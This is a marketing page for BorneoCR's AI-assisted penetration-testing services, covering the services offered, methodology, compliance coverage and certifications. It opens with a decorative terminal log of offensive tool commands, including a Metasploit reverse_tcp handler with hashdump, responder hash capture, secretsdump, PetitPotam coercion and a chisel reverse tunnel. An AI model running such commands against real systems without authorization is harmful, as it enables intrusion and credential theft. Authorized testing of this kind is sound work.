$ nmap -sV -sC -O 10.0.0.0/24
Starting Nmap 7.94 ( https://nmap.org )
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.9
80/tcp  open  http     nginx 1.24
443/tcp open  https    Apache 2.4.58
3306/tcp open mysql    MySQL 8.0.35
$ sqlmap -u "https://target/api?id=1" --dbs
[INFO] testing connection to the target URL
[INFO] testing SQL injection on GET parameter 'id'
[INFO] GET parameter 'id' is vulnerable
available databases [3]:
[*] information_schema
[*] production_db
[*] user_sessions
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST 10.0.0.5
msf6 > exploit
[*] Started reverse TCP handler on 10.0.0.5:4444
[*] Meterpreter session 1 opened
meterpreter > sysinfo
Computer    : DC01
OS          : Windows Server 2022
Domain      : CORP.LOCAL
meterpreter > hashdump
Administrator:500:aad3b435:e02bc50...
$ borneo-scan --target https://target.com --severity critical,high
[critical] CVE-2024-21887 [http]
[high] CVE-2023-46805 [http]
[medium] CVE-2023-44487 [http]
$ python3 bloodhound.py -d corp.local
[*] Collecting domain info
[*] Found 847 users
[*] Found 12 domain admins
[*] Shortest path to DA: 3 hops
$ responder -I eth0 -wrf
[+] Listening for events...
[*] [LLMNR] Poisoned answer sent
[*] [NTLMv2] Hash captured: jdoe::CORP
$ kerbrute userenum users.txt -d corp.local
[+] [email protected] - VALID
[+] [email protected] - VALID
$ crackmapexec smb 10.0.0.0/24 --shares
SMB  10.0.0.10  445  DC01  [+] CORP\admin
    
$ burpsuite --project pentesting-2026
[*] Proxy listener started on 127.0.0.1:8080
[*] Scanning https://app.target.com
[CRITICAL] SQL Injection in /api/v2/users
[HIGH] Stored XSS in /dashboard/comments
[HIGH] IDOR in /api/orders/{id}
[MEDIUM] Missing CSRF token on /settings
$ gobuster dir -u https://target.com -w common.txt
/admin          (Status: 302) [Size: 0]
/api            (Status: 200) [Size: 4521]
/backup         (Status: 403) [Size: 0]
/.env           (Status: 200) [Size: 892]
/graphql        (Status: 200) [Size: 12]
$ ffuf -w params.txt -u https://target/FUZZ
[Status: 200] [Size: 1337] debug
[Status: 200] [Size: 4096] admin_panel
[Status: 302] [Size: 0]    internal_api
$ hashcat -m 1000 hashes.txt rockyou.txt
$   Session: hashcat
$   Status: Running
$   Hash.Type: NTLM
$   Speed: 48.2 GH/s
$   Recovered: 14/20 (70.00%)
$ impacket-secretsdump CORP/[email protected]
[*] Dumping LSA Secrets
[*] $MACHINE.ACC: aes256-cts
[*] DPAPI_SYSTEM: 01000000...
[*] NL$KM: 8a7b2c...
$ certipy find -u [email protected]
[*] Found 23 certificate templates
[!] ESC1: VulnTemplate - ENROLLEE_SUPPLIES_SUBJECT
[!] ESC4: WebServer - WRITE_DACL to low-priv
$ python3 coercer.py -t 10.0.0.10
[+] PetitPotam triggered successfully
[+] Authentication coerced from DC01$
    
$ subfinder -d target.com -silent
api.target.com
staging.target.com
dev.target.com
admin.target.com
vpn.target.com
$ amass enum -d target.com -passive
[*] OWASP Amass v4.2.0
[*] 47 names discovered
[*] 12 addresses found
$ nikto -h https://target.com
+ Server: nginx/1.24
+ /admin/: Admin login page found
+ /phpinfo.php: PHP info exposed
+ X-Frame-Options header missing
+ HTTP TRACE method enabled
$ wpscan --url https://target.com
[+] WordPress version 6.4.2
[!] 3 vulnerabilities identified
[i] Plugin: contact-form-7 v5.8
[!] CVE-2023-6449 (critical)
$ testssl.sh https://target.com
Testing protocols via sockets
 SSLv2     not offered (OK)
 SSLv3     not offered (OK)
 TLS 1     offered (NOT ok)
 TLS 1.1   offered (NOT ok)
 TLS 1.2   offered (OK)
 TLS 1.3   offered (OK)
 BEAST     VULNERABLE (TLS 1)
 POODLE    not vulnerable
$ shodan search "org:target"
Results found: 142
143.55.12.1  port:22  OpenSSH 7.6
143.55.12.5  port:443 nginx 1.18
143.55.12.8  port:8080 Apache Tomcat
143.55.12.20 port:3389 RDP
$ chisel server --reverse --port 8888
[*] Listening on 0.0.0.0:8888
[*] New connection from 10.0.0.50
[*] Tunnel established: R:1080
$ proxychains nmap -sT 172.16.0.0/24
[proxychains] Strict chain ...
172.16.0.1:22  open
172.16.0.5:445 open
172.16.0.10:80 open
    

Penetration Testing
Powered by AI

We combine artificial intelligence with experts certified in CEH Master, CPENT, ECSA, CEHPC, and LCSPC to expand the attack surface beyond what is humanly possible. High-value results in record time: massive coverage, hidden patterns, and findings that traditional scanners miss.

0
Tests Performed
0
Detected vulnerabilities
0
Resolved within 30 days
0
EC-Council Offensive Certifications

Artificial Intelligence in the Service of
Offensive Safety

Our AI platform analyzes, scans, and correlates data in parallel, exponentially expanding the scope of what a human team can cover. The result: more thorough and faster penetration testing, with findings that traditional methods cannot uncover.

blur_on

Expanded Attack Area

Our AI scans thousands of endpoints, subdomains, and configurations simultaneously, covering an attack surface that would take weeks to scan manually.

speed

Unprecedented Speed

What used to take weeks is now completed in days. AI runs automated tests 24/7 while our experts analyze the most impactful findings.

psychology

Detection of Hidden Patterns

AI models detect correlations and vulnerability patterns that the human eye cannot perceive: complex chains of exploitation, interconnected weak configurations, and non-obvious attack paths.

Traditional Penetration Testing vs. Penetration Testing with IA BorneoCR

remove_circle_outlineTraditional Penetration Testing

dns~500 endpoints evaluated
schedule3–4 weeks to complete
searchKnown and Predictable Findings
personLimited by the device's capacity

auto_awesomePentesting with BorneoCR AI

dns10,000+ endpoints analyzed
speed5–7 days for deep results
psychologyDeep Insights + Hidden Patterns
smart_toyAI + certified experts = comprehensive coverage

What's included in the service

Comprehensive offensive security coverage powered by artificial intelligence, tailored to your organization's specific needs.

bug_report

Black, White, and Gray Box Penetration Testing

Testing methods tailored to your objective: Black-box testing simulates an external attacker with no prior information; gray-box testing evaluates the system with partial access (user credentials); white-box testing examines the source code and the entire architecture.

auto_awesomeAI-powered for massive endpoint coverage
shield

Vulnerability Assessment

Scanning using specialized tools combined with manual validation. CVSS v3.1 classification and mapping to MITRE ATT&CK for each finding.

auto_awesomeAI-powered automated scanning that prioritizes based on actual business risk
language

Web Security (OWASP Top 10)

Testing with Burp Suite Pro and OWASP ZAP. Comprehensive coverage: SQLi, XSS, SSRF, IDOR, broken authentication, mass assignment, and the 10 most critical vulnerabilities according to OWASP 2025.

auto_awesomeAI-powered intelligent fuzzing that uncovers vulnerabilities in business logic
api

API Security

REST, GraphQL, and gRPC testing. Validation of OAuth/JWT authentication, BOLA/BFLA (OWASP API Top 10), rate limiting, and exposure of sensitive data.

auto_awesomeAutomated Analysis of Authentication Schemes and Flows Using Machine Learning
smartphone

Mobile App Security

Static (SAST) and dynamic (DAST) analysis on Android and iOS in accordance with the OWASP Mobile Top 10. Review of local storage, communications, certificate pinning, and business logic.

auto_awesomeAI-powered static analysis to detect unsafe patterns in code
swords

Social Engineering and Red Team

Phishing campaigns with click-through and reporting metrics, telephone vishing, and in-person pretexting. Comprehensive Red Team exercises with MITRE ATT&CK mapping and collaborative Purple Team exercises with your defense team.

auto_awesomeAI for Automated Detection and Generation of Adaptive Attack Vectors

Types of Evaluation

From rapid assessments to long-term Red Team operations. Select the level that's right for your organization.

searchVulnerability Assessment bug_reportPenetration Test swordsRed Team
Objective Get a comprehensive map of known vulnerabilities in your infrastructure. You’ll receive a list prioritized by actual criticality so your IT team knows exactly what to fix first and can measurably reduce your attack surface. We use concrete evidence to demonstrate how a real attacker could compromise your critical systems. We don’t just tell you what’s vulnerable—we show you the entire exploitation chain, the business impact, and the escalation paths an adversary would use. Simulate a full-scale adversarial operation—involving people, processes, and technology—with a specific objective (e.g., accessing financial data, compromising the Active Directory). You can measure your organization’s actual detection and response capabilities against a sophisticated attacker.
Scope Your entire exposed surface: servers, networks, web applications, APIs, and cloud services. The assessment covers both internal and external assets to give you complete visibility into your security posture. Critical systems defined in collaboration with you: business applications, databases containing sensitive information, and internal and perimeter network infrastructure. We focus on areas where the impact on the business is greatest. Its comprehensive approach covers all aspects: technical infrastructure, employees (social engineering), physical controls, incident response processes, and SOC capabilities. A comprehensive exercise that evaluates defense in depth.
Secrecy No confidentiality is required. Testing is coordinated with your IT team to maximize coverage. This ensures that there are no operational disruptions and that your team understands every step of the process. Partial stealth: This tests whether your security controls detect exploit activity. This reveals actual gaps in your monitoring—alerts that don’t trigger, logs that aren’t reviewed, and controls that don’t function as expected. Maximum stealth with active evasion of defenses: we simulate the tactics, techniques, and procedures (TTPs) of real APT groups. The value lies in assessing whether your security team, SOC, and tools can detect and respond to an advanced and persistent adversary.
Deliverable A 30-50-page PDF report containing a prioritized list of CVEs, CVSS v3.1 scores, step-by-step remediation recommendations, and an executive summary for management. Includes a follow-up session 30 days later to verify remediation. Two reports: an executive summary (10–15 pages covering business impact, estimated financial risk, and strategic recommendations) and a technical report (40–80 pages covering evidence, reproduction steps, and MITRE ATT&CK mapping). Includes a free retest after 30 days. A comprehensive account of the operation, including a documented kill chain, attack timeline, TTPs used, analysis of gaps in detection and response, and a phased improvement plan. Includes an in-person debriefing with your security team and quarterly follow-up.
Ideal for Organizations that need a security baseline, are preparing for certification (ISO 27001, PCI DSS), or want to prioritize security investments based on concrete data. Also for companies that have never conducted security testing. Companies with critical digital assets (e-commerce, banking, healthcare, SaaS) that need to demonstrate to regulators, customers, or their board of directors that their systems can withstand real-world attacks. Organizations that have already addressed the findings of a previous vulnerability assessment. Mature security organizations that already have SOCs, SIEMs, and advanced controls in place, and need to validate their ability to detect and respond to advanced persistent threats (APTs). Banks, insurance companies, government agencies, and critical infrastructure.

Penetration Testing for Regulatory Compliance

Many regulations require periodic penetration testing. We help you meet every requirement with auditable evidence.

Requirement 11.3

PCI DSS

Mandatory annual penetration testing for payment processors. Coverage includes network segmentation, payment applications, and access controls for the cardholder data environment.

Control A.12.6

ISO 27001

Management of technical vulnerabilities as a mandatory control of the ISMS. Documented evidence for certification audits and maintenance of the management system.

Law 8968

LPDP Costa Rica

Security validation of stored and processed personal data. Specific testing of databases containing sensitive information and consent workflows.

Trust Services Criteria

SOC 2 Type II

Evidence of security testing for Trust Services criteria. Reports that comply with SOC 2 auditors' requirements regarding security controls.

Certifications Offensive

Our team holds active, internationally recognized certifications in offensive security.

verified_user

CEH

Certified Ethical Hacker — EC-Council

shield_with_heart

ECSA

Certified Security Analyst — EC-Council

military_tech

CEHPC

CEH Practical Certified

workspace_premium

LCSPC

Certified Licensed Penetration Tester

emoji_events

CEH Master

Certified Ethical Hacker Master — EC-Council

security

CPENT

Certified Penetration Testing Professional — EC-Council

How we work

A structured methodology based on PTES and the OWASP Testing Guide.

1. Acknowledgment

Passive and active information gathering: domains, subdomains, technologies, employees, and exposed attack surface.

2. Scanning and Enumeration

Identification of ports, services, versions, and known vulnerabilities using automated tools and manual validation.

3. Exploitation

Controlled exploitation of vulnerabilities to demonstrate real-world impact. Privilege escalation and lateral movement.

4. Post-Operation

Persistence assessment, test data exfiltration, and analysis of the scope of the compromise within the network.

5. Executive and Technical Report

Delivery of a report containing findings prioritized by risk, detailed evidence, and actionable remediation recommendations.

Why BorneoCR

We're not just an automated scanner, nor are we just manual consultants. We're AI + a real offensive team.

verified

Team with CEH Master, CPENT, ECSA, CEHPC, and LCSPC certifications

Professionals active in CTFs and bug bounties with experience in government, banking, and retail in Costa Rica and Central America.

description

Executive and Technical Reports

Management report with estimated financial impact and business risk. Technical report with reproduction steps, evidence, and MITRE ATT&CK mapping for each finding.

science

Proven Methodology

We follow the PTES (Penetration Testing Execution Standard) and the OWASP Testing Guide. Each test is repeatable, documented, and auditable.

Protect Your Business before the attack

Schedule a free initial assessment. Our team will analyze your attack surface and provide you with a preliminary assessment.

sendRequest an Evaluation